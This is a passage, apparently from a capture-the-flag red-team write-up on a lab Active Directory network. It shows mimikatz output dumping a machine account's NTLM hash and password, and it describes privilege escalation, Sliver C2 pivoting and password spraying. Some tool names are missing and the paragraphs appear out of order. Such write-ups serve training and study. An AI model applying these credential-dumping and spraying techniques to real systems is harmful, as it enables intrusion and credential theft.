Logon Server : (null)
Logon Time : 11/6/2024 11:23:48 AM
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DEV-SRV01$
* Domain : CORP
* NTLM : 684fff6a76f28089cd6aeaaf8364f51b
* SHA1 : 8e57f40a118accbb5e7f5e418c5eeca2663c0802
* DPAPI : 8e57f40a118accbb5e7f5e418c5eeca2
tspkg :
wdigest :
* Username : DEV-SRV01$
* Domain : CORP
* Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
kerberos :
* Username : DEV-SRV01$
* Domain : corp.darklab.local
* Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DEV-SRV01$
Domain : CORP
Logon Server : (null)
Logon Time : 11/6/2024 11:23:47 AM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DEV-SRV01$
* Domain : CORP
* Password : 08 30 17 39 79 3b 78 bb 0c f5 6d 3c 0a f3 2d e6 7d c5 5a ad e7 f2 c4 5a 41 00 c1 f5 bf 34 9d 2b ee 2d 5d 55 92 2c e4 05 b7 71 b8 1d a6 6a fe cb 48 40 51 97 5a b2 8f da 22 9a 71 a4 3e 1f d5 9c 5d 0b 03 5e 4d 1c cc 38 70 cc d0 22 5e e5 6f cf b0 6b 04 0b d8 d1 38 af 15 84 9c 22 05 24 f5 89 ee 35 89 15 23 7d 80 46 bf 10 bf ac 3d d4 74 a6 0b a7 be 38 27 1b 1f d8 4e 33 c6 4d f2 62 44 54 fb 49 a9 eb 2b 3a e3 7d b3 0a 5d a6 fa 99 d2 6e 3b c8 e6 df 21 e7 3e f5 c3 80 71 c6 d3 80 f2 06 fd c2 99 2b ff 5f d9 6e 8b 3c 59 99 d3 2b 25 f1 0e 7d d2 51 03 0b 52 62 24 74 f0 32 fe 90 9b ff eb 5a 13 bf 40 57 17 26 2f d0 10 6f 7a a3 d3 23 d6 2f d1 21 8c df fb b4 e6 a1 2c 56 8a eb 03 ea e2 02 4f 96 84 7b bc 7e 52 f0 d0 64 d1 af 44 16
kerberos :
* Username : dev-srv01$
* Domain : CORP.DARKLAB.LOCAL
* Password : (null)
ssp :
credman :
mimikatz(commandline) # exit
Bye!Note: I lost the flag and the screenshot for it, but trust me, we got it
Category : Red Team Points : 50
Two easily accessible external-facing services are there for obtaining initial access! If you have flags from external servers, attempt to input them into either Easy Initial Access - 1 or Easy Initial Access - 2. Both entry points offer identical information to assist you in hacking into the corporate internal network!
Flag format for red team: Hack{[sha256string]}
Going nowhere with DEV-SRV01, I went back to WEB-SRV01 to find the second flag for initial access. Stumbling around I found it within C:\xampp\htdocs.
That got us the flag which saved us for a short time.
Hack{[a4b743lce84b09e00334da20c6bbbl6d96802dc207b5afb76f6lc0a02a7e060e]}So, with that said what went wrong this time? Credential reuse. Remember the user tester? We did not reuse that set of credentials anywhere. The second thing that went wrong was that we were the Local Administrator of DEV-SRV01, meaning we could have dumped out domain cached credentials from the SAM and SYSTEM hive which I did. However, cracking those credentials took ages and my laptop was becoming hot. In conclusion, even though I did not complete all of the Active Directory challenges, I was proud that I was able to do the challenges properly this time with my knowledge that I gained while preparing for my OSCP. Also, that I was able to learn how to use the Sliver C2 for my OSEP which I am currently preparing for. I hope you learned something from this write-up. Now, let me check my costs for running an instance on AWS the whole day...
Now that we have foothold, let's see what privileges we have. As shown below, we have SeImpersonatePrivilege privilege. Now, my go-to tool for escalating my privileges with this misconfiguration is . My second go-to tool is , but that only works if the target has .NET installed.
With that let's configure for pivoting into the internal access. Start by adding a new interface on the attacker machine.
Now that we have a second set of credentials, can be used to spray the credentials in the domain to check whether the user can access any of the internal machines. Learn from Counter-Strike, always SPRAY AND PRAY. The credentials can be sprayed using the following command:
